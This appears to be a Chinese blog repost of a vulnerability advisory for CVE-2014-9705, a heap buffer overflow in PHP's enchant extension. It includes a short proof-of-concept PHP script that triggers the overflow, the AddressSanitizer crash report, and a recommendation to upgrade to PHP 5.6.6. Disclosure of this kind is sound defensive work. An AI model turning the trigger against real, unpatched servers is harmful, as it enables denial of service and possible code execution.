linux算法溢出 PHP,PHP堆缓冲区溢出漏洞

最新推荐文章于 2023-02-25 10:13:09 发布
最新推荐文章于 2023-02-25 10:13:09 发布
阅读量315 收藏
点赞数
文章标签: linux算法溢出 PHP
该博客详细介绍了PHP 5.6.5版本中enchant_broker_request_dict()函数存在的堆缓冲区溢出漏洞,可能导致拒绝服务或执行任意代码。通过示例代码展示了漏洞触发过程,并提供了AddressSanitizer的错误报告。建议用户升级到PHP 5.6.6或更高版本以修复此安全问题。
摘要由CSDN通过智能技术生成

发布日期:2014-12-05

更新日期:2015-03-16

受影响系统:

PHP PHP <= 5.6.5

描述:

CVE(CAN) ID: CVE-2014-9705

PHP是一种通用开源脚本语言。

PHP 5.6.5及更早版本,enchant_broker_request_dict()函数存在堆缓冲区溢出漏洞,远程攻击者可利用此漏洞覆盖4个字节的堆缓冲区,造成拒绝服务或执行任意代码。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$tag = 'en_US';

$r = enchant_broker_init();

$d = enchant_broker_request_dict($r, $tag);

enchant_dict_quick_check($d, 'one', $suggs);

$d = enchant_broker_request_dict($r, $tag);

enchant_dict_quick_check($d, 'one', $suggs);

$d = enchant_broker_request_dict($r, $tag);

?>

Result:

========

[Fri Dec 5 13:32:59 2014] Script: '/home/symeon/Desktop/dict.php'

---------------------------------------

/home/ symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:

Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)

Start: OK

End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)

At least 4 bytes overflown

---------------------------------------

============================ =====================================

==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c

WRITE of size 4 at 0xaf9a0f78 thread T0

#0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571

#1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558

#2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595

#3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363

#4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388

#5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344

#6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584

#7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994

#8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378

#9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

#10 0x807d080 in _start ??:?

0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)

==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)

#0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?

#1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?

#2 0xb616ef1e in ?? ??:0

#3 0xb61836d3 in __asan_unpoison_stack_memory ??:?

#4 0xb6184b7f in __asan_report_error ??:?

#5 0xb617db2e in __asan_report_store4 ??:?

#6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571

#7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558

#8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595

#9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363

#10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388

#11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344

#12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584

#13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994

#14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378

#15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

建议:

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载5.6.6版本:

PHP 的详细介绍:请点这里

PHP 的下载地址:请点这里

0b1331709591d260c1c78e86d0c51c18.png

weixin_39963534
关注
php组件缓冲区溢出漏洞,一个缓冲区溢出漏洞的简易教程
weixin_39629075的博客
03-12 1209
这篇文章类似于“傻瓜系列之利用缓冲区溢出”。在这类漏洞中,我们的做法是利用网络,程序控制器,输入等等,发送超大的数据缓冲区给程序,覆盖程序内存的重要部分。在这些缓冲区覆盖程序内存之后,我们可以重定向程序的执行流并运行注入代码。首先,我们需要做的是查明程序的哪一部分可以用来重写内存。处理这个任务的过程叫作“fuzzing”。我们可以为Metasploit框架中的各种协议找到若干个fuzzer(执行f...
使用AddressSanitizer排查代码内存问题
bitkevin的博客
08-30 863
AddressSanitizer是Google提供的开源内存检查工具,LLVM3.1 或者gcc4.8以上版本编译器已经支持,可以调查程序的内存越界和内存泄漏问题。 用法: 编译时加上以下编译选项: -fsanitize=address #开启地址越界检查功能 -fno-omit-frame-pointer #开启后,可以出具更详细的错误信息 -fsanitize=leak #开启内存泄露检查功能 (apple版llvm不支持) AddressSanitizer能检测的错误类型: ...
php 缓冲区溢出漏洞,PHP Tidy库远程缓冲区溢出漏洞
weixin_28787801的博客
03-25 506
受影响系统:C. Reitzel TidyLib for PHP 050506描述:--------------------------------------------------------------------------------BUGTRAQ ID: 24527Tidy库用于改正HTML文档中的常见错误并生成格式编排良好的等价文档,还可以生成XHTML格式的文档。Tidy库实现上存...
缓冲区溢出漏洞
cyynid的博客
02-25 4100
在计算机操作系统中,“缓冲区”是指内存空间中用来存储程序运行时临时数据的一片大小有限并且连续的内存区域。根据程序中内存的分配方式和使用目的,缓冲区一般可分为栈和两种类型。C语言程序中定义的数组就是一种最常见的栈缓冲区。缓冲区溢出漏洞,作为软件中最容易发生的一类漏洞,其形成原理就是:当程序在处理用户数据时,未能对其大小进行恰当的限制,或者在进行拷贝、填充时没对这些数据限定边界,导致实际操作的数据大小超过了内存中目标缓冲区的大小,使得内存中一些关键数据被覆盖、从而引发安全问题。
php缓冲区溢出漏洞,PHP “socket_connect()”函数栈缓冲区溢出漏洞
weixin_29868343的博客
04-10 328
发布日期:2011-05-24更新日期:2011-05-25受影响系统:PHP PHP 5.3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 47950CVE ID: CVE-2011-1938PHP是英文超级文本预处理语言(PHP:Hypertext...
linux算法溢出 PHP,PHP '_php_stream_scandir()'缓冲区溢出漏洞
最新发布
05-16
这是一种常见的安全漏洞,叫作缓冲区溢出漏洞。在 PHP 中,当函数 `_php_stream_scandir()` 被传递恶意构造的参数时,会导致缓冲区溢出,从而导致攻击者可以执行任意代码或者控制程序流程。攻击者可以利用这个漏洞来...
论文研究-基于多维Fuzzing的缓冲区溢出漏洞挖掘技术研究.pdf
07-22
基于多维Fuzzing设计和实现了一种缓冲区溢出漏洞挖掘模型MFBOF,应用输入样本结构知识、结合静态二进制分析技术和动态输入/输出测试技术,运用自适应模拟退火遗传算法生成测试用例进行测试,并以挖掘Libpng的漏洞为...
论文研究-一种抗地址淹没的缓冲区栈溢出算法.pdf
07-22
缓冲区溢出是常见的网络漏洞攻击,其中最重要的是栈溢出攻击。通过分析缓冲区溢出攻击的方法和特点,提出一种基于StackShield改进的RetProtect算法。首先利用IDA Pro对源程序反汇编分析,然后建立新的库函数,并通过...
缓冲区溢出漏洞分析技术研究进展.pdf
12-16
【摘要】:本文主要探讨了缓冲区溢出漏洞的危害及其广泛性,并深入解析了缓冲区溢出漏洞的定义、操作系统的内存组织方式以及攻击手段。文章将缓冲区溢出分析技术分为自动检测、自动修复和运行时防护三类,分别进行...
ASAN Pass【源码分析】(五)——插桩
小气球归来的博客
08-12 1772
ASAN Pass【源码分析】(五)——插桩
php crypt函数缓冲区溢出漏洞,简单缓冲区溢出漏洞攻击实验
weixin_39568597的博客
03-24 432
缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。实验准备之前一直听说缓冲区溢出攻击,具体是什么,怎么回事。一直没有学习过。正好今天有时间。一边学习一边写下此文。本次实验只是想体会了解一下缓冲区溢出攻击,复现一次简单的提权过程。没有较为深...
使用AddressSanitizer进行内存访问越界检查
C_lazy的专栏
04-19 2万+
一、AddressSanitizer简介    本人这次使用AddressSanitizer是因工作上负责的程序发生了内存越界访问,非法修改了第三方内存管理库的内存数据,使程序偶尔发生coredump。使用valgrind时,一直报以下错误,网上也没有找到解决方法,对比后选择AddressSanitizer。valgrind: mmap(0xf10000, 1027244032) failed i...
Linux中的常用内存问题检测工具
热门推荐
世事难料,保持低调
06-27 4万+
C/C++等底层语言在提供强大功能及性能的同时,其灵活的内存访问也带来了各种纠结的问题。如果crash的地方正是内存使用错误的地方,说明你人品好。如果crash的地方内存明显不是consistent的,或者内存管理信息都已被破坏,并且还是随机出现的,那就比较麻烦了。当然,祼看code打log是一个办法,但其效率不是太高,尤其是在运行成本高或重现概率低的情况下。另外,静态检查也是一类方法,有很多工具(lint, cpp
解决XCode 7 AddressSanitizer: heap-buffer-overflow的问题
yqmfly的专栏
08-31 6341
看到苹果系统发布了新版本,禁不住升级了,用了xcode 7。后来不知啥时候开启了AddressSanitizer,再后来调试的时候,突然就挂了,出的问题就是==12463==ERROR: AddressSanitizer: heap-buffer-overflow on address。而且这个开启后,就是在用XCode安装App到设备后,点击XCode的停止,再直接在设备上点击App,就会闪退。关
AddressSanitizer 内存检测工具
haima1998的专栏
05-27 1万+
还有另一个内存检查工具valgrind 转自:https://code.google.com/p/address-sanitizer/ AddressSanitizer: a fast memory error detector Updated Apr 22, 2014 by konstant...@gmail.com IntroductionGet
AddressSanitizer
whuzm08的专栏
07-03 5862
sanitizers This project is the home for Sanitizers: AddressSanitizer, MemorySanitizer, ThreadSanitizer, LeakSanitizer, and more The actual code resides in the LLVM repository. Here we keep extended do...
缓冲区溢出漏洞:原理、防护与研究进展
"缓冲区溢出漏洞研究与进展" 缓冲区溢出漏洞是计算机安全领域中的一个重大问题,自1988年的蠕虫病毒以来,它一直是威胁网络安全的主要因素之一。这种漏洞通常发生在程序处理数据时,由于没有正确地限制输入数据的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值